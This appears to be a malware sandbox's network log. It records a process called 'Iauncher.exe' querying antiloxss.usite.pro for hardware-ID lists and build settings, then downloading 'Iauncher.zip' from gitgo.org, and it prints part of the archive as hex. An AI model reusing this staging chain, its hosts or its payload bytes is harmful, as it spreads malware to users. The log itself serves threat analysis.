                                                                                                                                                                            May 1, 2024 20:46:21.919102907 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.919303894 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.919337034 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.919534922 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.919661999 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.919735909 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.919769049 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.919800043 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.920248985 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.920439005 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.920933962 CEST4974247232192.168.2.4147.45.47.65
                                                                                                                                                                            May 1, 2024 20:46:21.921005011 CEST4974247232192.168.2.4147.45.47.65
                                                                                                                                                                            May 1, 2024 20:46:21.928167105 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.928215981 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.928247929 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.928380966 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.928602934 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.928653955 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.928872108 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.929088116 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.929153919 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.929205894 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.929306984 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.929480076 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.929668903 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.929701090 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.929919958 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.929972887 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.930159092 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:21.931601048 CEST4974247232192.168.2.4147.45.47.65
                                                                                                                                                                            May 1, 2024 20:46:21.931669950 CEST4974247232192.168.2.4147.45.47.65
                                                                                                                                                                            May 1, 2024 20:46:22.124191046 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.124316931 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.124350071 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.124488115 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.124665022 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.124790907 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.124864101 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.124896049 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.124986887 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.125068903 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.125179052 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.125338078 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.125370026 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.125519991 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.125552893 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.125660896 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.125711918 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.125936031 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.126199961 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.126357079 CEST4974247232192.168.2.4147.45.47.65
                                                                                                                                                                            May 1, 2024 20:46:22.134794950 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.134829998 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.134902000 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.135113001 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.135226965 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.135349035 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.135638952 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.135808945 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.135839939 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.135989904 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.136020899 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.136253119 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.136409044 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.136441946 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.136472940 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.136611938 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.136709929 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.329513073 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.329569101 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.329634905 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.329786062 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.330212116 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.372440100 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.429979086 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.430851936 CEST4974247232192.168.2.4147.45.47.65
                                                                                                                                                                            May 1, 2024 20:46:22.634906054 CEST4723249742147.45.47.65192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:22.667356014 CEST4974247232192.168.2.4147.45.47.65
                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            May 1, 2024 20:46:00.567176104 CEST5597753192.168.2.41.1.1.1
                                                                                                                                                                            May 1, 2024 20:46:00.666878939 CEST53559771.1.1.1192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:02.745066881 CEST5101753192.168.2.41.1.1.1
                                                                                                                                                                            May 1, 2024 20:46:02.840274096 CEST53510171.1.1.1192.168.2.4
                                                                                                                                                                            May 1, 2024 20:46:08.329915047 CEST5098253192.168.2.41.1.1.1
                                                                                                                                                                            May 1, 2024 20:46:08.434094906 CEST53509821.1.1.1192.168.2.4
                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                            May 1, 2024 20:46:02.851413965 CEST192.168.2.4142.251.163.1134d5aEcho
                                                                                                                                                                            May 1, 2024 20:46:02.946630955 CEST142.251.163.113192.168.2.4555aEcho Reply
                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                            May 1, 2024 20:46:00.567176104 CEST192.168.2.41.1.1.10x3c29Standard query (0)antiloxss.usite.proA (IP address)IN (0x0001)false
                                                                                                                                                                            May 1, 2024 20:46:02.745066881 CEST192.168.2.41.1.1.10x3009Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                            May 1, 2024 20:46:08.329915047 CEST192.168.2.41.1.1.10xdb8cStandard query (0)gitgo.orgA (IP address)IN (0x0001)false
                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                            May 1, 2024 20:46:00.666878939 CEST1.1.1.1192.168.2.40x3c29No error (0)antiloxss.usite.pro193.109.246.100A (IP address)IN (0x0001)false
                                                                                                                                                                            May 1, 2024 20:46:02.840274096 CEST1.1.1.1192.168.2.40x3009No error (0)google.com142.251.163.113A (IP address)IN (0x0001)false
                                                                                                                                                                            May 1, 2024 20:46:02.840274096 CEST1.1.1.1192.168.2.40x3009No error (0)google.com142.251.163.138A (IP address)IN (0x0001)false
                                                                                                                                                                            May 1, 2024 20:46:02.840274096 CEST1.1.1.1192.168.2.40x3009No error (0)google.com142.251.163.100A (IP address)IN (0x0001)false
                                                                                                                                                                            May 1, 2024 20:46:02.840274096 CEST1.1.1.1192.168.2.40x3009No error (0)google.com142.251.163.102A (IP address)IN (0x0001)false
                                                                                                                                                                            May 1, 2024 20:46:02.840274096 CEST1.1.1.1192.168.2.40x3009No error (0)google.com142.251.163.101A (IP address)IN (0x0001)false
                                                                                                                                                                            May 1, 2024 20:46:02.840274096 CEST1.1.1.1192.168.2.40x3009No error (0)google.com142.251.163.139A (IP address)IN (0x0001)false
                                                                                                                                                                            May 1, 2024 20:46:08.434094906 CEST1.1.1.1192.168.2.40xdb8cNo error (0)gitgo.org104.21.44.179A (IP address)IN (0x0001)false
                                                                                                                                                                            May 1, 2024 20:46:08.434094906 CEST1.1.1.1192.168.2.40xdb8cNo error (0)gitgo.org172.67.202.98A (IP address)IN (0x0001)false
                                                                                                                                                                            • antiloxss.usite.pro
                                                                                                                                                                            • gitgo.org
                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            0192.168.2.449732193.109.246.1004432448C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-05-01 18:46:02 UTC98OUTGET /STLprograms/NEW/z-Closing.txt HTTP/1.1
                                                                                                                                                                            Host: antiloxss.usite.pro
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-05-01 18:46:02 UTC324INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 01 May 2024 18:45:59 GMT
                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                            Content-Length: 3
                                                                                                                                                                            Last-Modified: Mon, 15 Apr 2024 17:02:11 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            ETag: "661d5d93-3"
                                                                                                                                                                            Expires: Tue, 21 May 2024 18:45:59 GMT
                                                                                                                                                                            Cache-Control: max-age=1728000
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-05-01 18:46:02 UTC3INData Raw: 31 30 30
                                                                                                                                                                            Data Ascii: 100


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            1192.168.2.449734193.109.246.1004432448C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-05-01 18:46:03 UTC69OUTGET /STLprograms/NEW/hwid.txt HTTP/1.1
                                                                                                                                                                            Host: antiloxss.usite.pro
                                                                                                                                                                            2024-05-01 18:46:03 UTC327INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 01 May 2024 18:46:00 GMT
                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                            Content-Length: 183
                                                                                                                                                                            Last-Modified: Wed, 17 Apr 2024 21:03:02 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            ETag: "66203906-b7"
                                                                                                                                                                            Expires: Tue, 21 May 2024 18:46:00 GMT
                                                                                                                                                                            Cache-Control: max-age=1728000
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-05-01 18:46:03 UTC183INData Raw: 53 2d 31 2d 35 2d 32 31 2d 31 38 37 38 35 36 33 38 36 33 2d 32 36 32 37 33 37 33 32 30 37 2d 33 31 31 34 31 32 37 33 33 33 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 32 34 39 39 36 32 30 37 39 39 2d 32 34 31 35 33 31 36 38 39 31 2d 38 37 34 30 38 34 35 34 36 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 31 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31
                                                                                                                                                                            Data Ascii: S-1-5-21-1878563863-2627373207-3114127333-1001S-1-5-21-2499620799-2415316891-874084546-1001S-1-5-21-32078755-17691142541-1048030575-1001S-1-5-21-32078755-1769114254-1048030575-1001


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            2192.168.2.449735193.109.246.1004432448C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-05-01 18:46:04 UTC77OUTGET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1
                                                                                                                                                                            Host: antiloxss.usite.pro
                                                                                                                                                                            2024-05-01 18:46:04 UTC326INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 01 May 2024 18:46:01 GMT
                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                            Content-Length: 44
                                                                                                                                                                            Last-Modified: Wed, 24 Apr 2024 18:13:24 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            ETag: "66294bc4-2c"
                                                                                                                                                                            Expires: Tue, 21 May 2024 18:46:01 GMT
                                                                                                                                                                            Cache-Control: max-age=1728000
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-05-01 18:46:04 UTC44INData Raw: 53 2d 31 2d 35 2d 32 31 2d 32 32 35 32 33 36 39 36 35 36 2d 31 30 35 37 34 34 30 37 34 30 2d 38 33 34 34 36 37 31 33 2d 31 30 30 31
                                                                                                                                                                            Data Ascii: S-1-5-21-2252369656-1057440740-83446713-1001


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            3192.168.2.449737193.109.246.1004432448C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-05-01 18:46:05 UTC88OUTGET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1
                                                                                                                                                                            Host: antiloxss.usite.pro
                                                                                                                                                                            2024-05-01 18:46:05 UTC326INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 01 May 2024 18:46:02 GMT
                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                            Content-Length: 30
                                                                                                                                                                            Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            ETag: "662a75ba-1e"
                                                                                                                                                                            Expires: Tue, 21 May 2024 18:46:02 GMT
                                                                                                                                                                            Cache-Control: max-age=1728000
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-05-01 18:46:05 UTC30INData Raw: 68 74 74 70 73 3a 2f 2f 67 69 74 67 6f 2e 6f 72 67 2f 49 61 75 6e 63 68 65 72 2e 7a 69 70
                                                                                                                                                                            Data Ascii: https://gitgo.org/Iauncher.zip


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            4192.168.2.449739193.109.246.1004432448C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-05-01 18:46:07 UTC88OUTGET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1
                                                                                                                                                                            Host: antiloxss.usite.pro
                                                                                                                                                                            2024-05-01 18:46:07 UTC325INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 01 May 2024 18:46:03 GMT
                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                            Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            ETag: "662a75ba-c"
                                                                                                                                                                            Expires: Tue, 21 May 2024 18:46:03 GMT
                                                                                                                                                                            Cache-Control: max-age=1728000
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-05-01 18:46:07 UTC12INData Raw: 49 61 75 6e 63 68 65 72 2e 65 78 65
                                                                                                                                                                            Data Ascii: Iauncher.exe


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            5192.168.2.449740193.109.246.1004432448C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-05-01 18:46:08 UTC91OUTGET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1
                                                                                                                                                                            Host: antiloxss.usite.pro
                                                                                                                                                                            2024-05-01 18:46:08 UTC325INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 01 May 2024 18:46:04 GMT
                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                            Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            ETag: "662a75ba-c"
                                                                                                                                                                            Expires: Tue, 21 May 2024 18:46:04 GMT
                                                                                                                                                                            Cache-Control: max-age=1728000
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-05-01 18:46:08 UTC12INData Raw: 49 61 75 6e 63 68 65 72 2e 7a 69 70
                                                                                                                                                                            Data Ascii: Iauncher.zip


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            6192.168.2.449741104.21.44.1794432448C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-05-01 18:46:08 UTC71OUTGET /Iauncher.zip HTTP/1.1
                                                                                                                                                                            Host: gitgo.org
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-05-01 18:46:09 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Wed, 01 May 2024 18:46:09 GMT
                                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                                            Content-Length: 418397
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thu, 25 Apr 2024 15:31:32 GMT
                                                                                                                                                                            ETag: "6625d-616ed7b506247"
                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5DZi%2Fs%2FolZRC7oQh%2F5S1s4QhkPbdRv2wQy7qBSeVUiTHrxgQfuRd6HeTGURsQLL0TonlZ6gSkugFXyuklpcTI5O%2BnEmzF6co9pLnBQFJubfcNTe9ZPWBE5ixl2c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 87d1eec11db7208e-IAD
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            2024-05-01 18:46:09 UTC690INData Raw: 50 4b 03 04 14 00 00 00 08 00 a5 93 99 58 7b a5 c2 5b bf 61 06 00 00 b6 07 00 0c 00 00 00 49 61 75 6e 63 68 65 72 2e 65 78 65 e4 fd 7d 7c 54 c5 f5 38 8e df dd bd 49 2e 64 c3 5d 60 81 08 51 22 ac 8a 06 35 b2 a8 89 1b 70 13 d8 24 5a 82 1b 62 76 89 98 c4 aa a4 e9 fa 84 70 2f 0f 4a 20 78 b3 9a 9b f1 2a 6d b5 b5 ad b6 fa b6 b6 fa b6 fd 94 b6 2a f8 bc c9 d2 3c 20 f2 a4 6f c5 a2 36 58 aa 13 37 6a 78 30 d9 40 c8 fd 9d 33 77 77 b3 60 50 fb 79 bf be df 3f be 3f 34 7b ef 9d 39 33 73 e6 cc cc 99 73 ce cc 9c 29 bb 61 33 67 e1 38 8e 87 3f 5d e7 b8 6d 9c f1 cf cd 7d f7 bf 28 fc 8d 9b fe ca 38 ee 85 31 6f 9f bb cd b4 e8 ed 73 af af ff f1 aa ec 15 2b ef fa d1 ca 1f de 91 7d cb 0f ef bc f3 2e 29 fb e6 e5 d9 2b e5 3b b3 7f 7c 67 f6 c2 eb 2a b2 ef b8 eb d6 e5 97 64 64 8c 75
                                                                                                                                                                            Data Ascii: PKX{[aIauncher.exe}|T8I.d]`Q"5p$Zbvp/J x*m*< o6X7jx0@3ww`Py??4{93ss)a3g8?]m}(81os+}.)+;|g*ddu
                                                                                                                                                                            2024-05-01 18:46:09 UTC1369INData Raw: 63 70 7d 0d 64 aa 5e 3e 17 de 9f 9e 05 3f 6a c6 6c f8 a5 cb b0 94 da 9a f0 cb eb f1 eb 99 cb 00 70 25 96 be 80 95 5e 5f 8f ef 57 b2 f7 9d f1 7f 64 a1 83 af 20 1f 00 66 b3 95 5b 78 4e b5 d0 a5 e5 80 90 e4 c8 aa f2 69 6b 6d ea 02 1e 70 fc 3c 03 82 8a 33 c9 22 87 5d 2d c9 24 0b f8 da 1a 55 80 87 5a ca b3 5f 7c 6f 77 5b 39 f6 c8 e0 48 78 59 9b 95 d3 25 87 00 29 04 fa ea 4c 8e 6b a5 d3 c3 58 d4 3c ec f7 2b 05 2f 45 46 54 15 0e 86 24 78 ff d4 8b ef ce 10 83 d0 4a 67 ba 3a c5 fb e7 9c cb 71 e5 74 27 c6 90 ce 60 97 34 56 2b 9c a9 74 77 ab a5 43 e1 9e 0b 7e cd 71 81 d9 f4 cf 18 a9 72 aa 9b 57 dd 42 5d 87 db 6a 32 85 2b c8 8d 0e 6b 25 e9 79 59 d7 f5 8d ae 0f d6 dc 10 10 97 ba f6 af 99 5a 01 d8 d8 d4 6a 5b a5 ea b1 53 3f 20 a4 6c b7 b6 f3 39 5c 64 ae cf 5f ee ad a0
                                                                                                                                                                            Data Ascii: cp}d^>?jlp%^_Wd f[xNikmp<3"]-$UZ_|ow[9HxY%)LkX<+/EFT$xJg:qt'`4V+twC~qrWB]j2+k%yYZj[S? l9\d_
                                                                                                                                                                            2024-05-01 18:46:09 UTC1369INData Raw: 64 6d 82 e6 7e 84 cf f3 62 8e f0 e9 88 e5 5c 7b 16 32 8d 17 58 6a 22 10 37 ef 55 9b d8 07 c0 14 94 b3 fc 9e c4 fc 6e 37 f2 73 f6 47 ce ff 8e 1c 33 18 64 26 f1 f2 44 40 28 06 0e 2d ba 82 b5 c0 85 c0 4a 19 db be de b1 56 e3 d7 7a 97 94 03 cc 2c 48 f6 5e 66 12 22 92 c3 cb 90 51 6e c9 e6 94 5b 1c 9c b7 dc 17 c7 44 6d 32 2a 78 20 93 21 84 3d 81 8e 07 d9 12 5e e6 d2 4b e0 05 fa d6 ad a4 1d b9 b8 73 27 bd f6 1a 84 5a da 96 6d 30 04 6d b1 8d 1e 3a 0b 99 85 8f 9e 7b 0d e3 15 6c ce 6f 5c 9b c1 c9 53 94 90 cd cb f8 49 db 80 31 d4 65 7e 38 14 31 cf 09 19 83 5a e9 b5 ea b2 8d 71 3d cf 31 6f c0 04 8c 5e f4 87 80 df 0f d5 89 13 21 84 fe 11 a6 a0 3a e2 19 52 b6 db bb c2 3e 3f cb 2a e3 4d 28 cd a4 ad 35 f9 a9 e9 d1 d8 5c 14 ec 97 a6 04 75 69 5c 6c 3a f9 fc 76 36 9d d4 92
                                                                                                                                                                            Data Ascii: dm~b\{2Xj"7Un7sG3d&D@(-JVz,H^f"Qn[Dm2*x !=^Ks'Zm0m:{lo\SI1e~81Zq=1o^!:R>?*M(5\ui\l:v6
                                                                                                                                                                            2024-05-01 18:46:09 UTC1369INData Raw: 9a 48 ef ce c2 61 0a 3d 23 ff c6 5c ab f8 48 38 62 fe 9b a9 b9 96 47 dd 65 59 12 e6 f3 18 e6 0b 13 f9 8f d6 69 80 84 65 87 bc 74 13 aa a1 9e 43 d0 47 a0 e3 20 e3 fe f5 49 d4 4b 0f d1 7b 6c d8 53 86 48 bb 91 91 f3 ed 1a fa ca d5 f1 de 71 98 2c e6 01 29 41 69 b5 d1 72 ec 65 1b 78 4e b2 82 16 b7 9a a7 f7 5f 6d 88 66 3d 79 10 81 d5 de 60 03 2a ed 87 3c a4 31 fa 6a 90 cf 08 c4 eb ab ed f4 65 7c e9 48 7d 16 62 40 90 1b 03 f9 a5 12 53 c0 a4 db b0 7d fd 3e 3a d9 81 19 cf e6 aa 30 dd 6c da 82 e0 4e 5d dd 30 3b 7f 83 03 83 1c 74 0d 06 a9 1b 1c f9 1b b2 30 20 8b d6 19 01 59 f9 1b ec 18 60 a7 95 46 80 3d 7f 83 d5 28 7d a1 11 60 cd df c0 63 00 4f 9d 46 00 4f 76 d5 d6 f4 5c 8e ea f1 18 62 62 63 4f 88 8f bd 9b 84 b0 56 c8 77 98 b0 cf 78 e9 e5 01 b4 37 91 6b 90 00 e3 71
                                                                                                                                                                            Data Ascii: Ha=#\H8bGeYietCG IK{lSHq,)AirexN_mf=y`*<1je|H}b@S}>:0lN]0;t0 Y`F=(}`cOFOv\bbcOVwx7kq
                                                                                                                                                                            2024-05-01 18:46:09 UTC1369INData Raw: c4 8d b1 18 83 2c 8a 0d d5 a4 b6 5f 6c 7a 16 9b de 94 53 f8 ac 80 cf 99 85 c8 49 b5 72 53 45 cb f4 c6 13 8b 24 be f9 ac 48 7a bb e9 9a ba 0e f3 15 73 95 36 33 e9 dc 74 90 03 36 b8 0c 5a 92 c7 d6 dd 72 57 64 32 bc 0b d0 17 52 5a 4a 4c 91 31 a1 6e 4b ff 1e 47 b6 75 69 b3 19 da b5 bd c8 04 12 45 9f 5e c8 1b e4 29 d0 3c 7d 15 3e bf 97 7c 40 1f cc 62 4a f1 bd d0 e9 b7 7b 9f 81 7f f4 df 59 c8 51 02 e9 55 da bd 99 a4 ef e8 33 cc d6 ce 73 9b 7a d1 c6 18 b7 ec 36 39 9a e0 ab a2 12 28 f0 01 bd ef 4f 68 45 d5 a0 4a 5e fa 07 4c 0d 89 21 cf f5 8e fa a3 cf 38 f5 37 90 c3 34 be c6 cc 5d 9c 7a af a0 de 0b 7a b7 5d b6 00 53 37 92 48 59 cc 3e e7 f6 82 88 f3 c8 17 d0 12 0b 30 62 ad d7 5f bf 1d 7b d3 eb 2c c8 a6 19 45 42 e8 4e 0c fd c3 17 a8 c1 cf 52 17 d8 e3 59 4b e7 43 aa
                                                                                                                                                                            Data Ascii: ,_lzSIrSE$Hzs63t6ZrWd2RZJL1nKGuiE^)<}>|@bJ{YQU3sz69(OhEJ^L!874]zz]S7HY>0b_{,EBNRYKC
